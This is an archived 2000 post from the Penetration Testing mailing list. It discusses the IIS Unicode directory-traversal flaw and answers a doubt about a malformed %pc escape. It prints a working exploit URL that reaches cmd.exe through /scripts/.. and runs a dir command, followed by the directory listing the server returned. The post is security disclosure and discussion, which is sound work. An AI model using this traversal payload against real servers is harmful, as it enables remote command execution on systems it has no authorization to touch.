Home page logo
/

pen-test logo Penetration Testing mailing list archives

Re: [PEN-TEST] IIS UNICODE Strings
From: Mike Ahern <mc_ahern () YAHOO COM>
Date: Tue, 31 Oct 2000 15:13:31 -0800

Vitaly Osipov [vos () TELENOR CZ] wrote:
Hmm... I see some *very* strange strings in you
examples below... the second excaped symbol (%pc for
example) is not real escaped hex-code -if it works,
then the problem is not in Unicode at all, but in
something else
---------------------------


Trust Me, It Works!!! Which is interesting since at
least one system reported as patched appears to be
still vulnerable. I had assumed the admin either
didn't patch, or used the wrong hotfix. Perhaps that
is not the case...

The Proof is in the Pudding:
----------------------------

http://10.X.X.X/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
 Directory of c:\

06/23/00  01:38p                     0 AUTOEXEC.BAT
06/23/00  01:38p                     0 CONFIG.SYS
06/23/00  01:40p        <DIR>          Dell
06/26/00  03:29p        <DIR>          INetPub
06/26/00  02:10p        <DIR>          MSSQL7
06/26/00  01:40p        <DIR>          Multimedia
Files
06/26/00  03:14p        <DIR>          My
Installations
06/27/00  01:05p        <DIR>          Program Files
06/30/00  09:00a        <DIR>          TEMP
07/10/00  11:42a        <DIR>          WINNT


 -mch



__________________________________________________
Do You Yahoo!?
From homework help to love advice, Yahoo! Experts has your answer.
http://experts.yahoo.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]